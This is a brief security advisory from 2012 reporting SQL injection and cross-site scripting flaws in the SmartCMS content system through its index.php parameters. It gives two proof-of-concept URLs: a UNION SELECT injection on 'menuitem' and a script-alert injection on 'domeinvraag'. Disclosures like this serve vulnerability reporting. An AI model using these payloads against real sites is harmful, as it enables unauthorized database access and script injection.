########################################################################## ## SmartCMS SQL Injection & Cross Site Scripting Vulnerabilities ## Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com> ## Date: 29/11/2012 ## Version: ALL ## Vendor Link: http://smartcms.nl/ ## ISRAEL ########################################################################## ## Author will be not responsible for any damage. ########################################################################## ## SQL Injection PoC: ## http://www.example.com/index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+version()-- ## Cross Site Scripting PoC: ## http://www.example.comindex.php?menuitem=26&domeinvraag=<script>alert(1);</script>&aktie=Zoek&idx=23 ########################################################################## # 0x31337.net ##########################################################################Брой прочитания на тази страница: 1405
SmartCMS (index.php, menuitem param) SQL Injection & Cross Site Scripting Vulnerabilities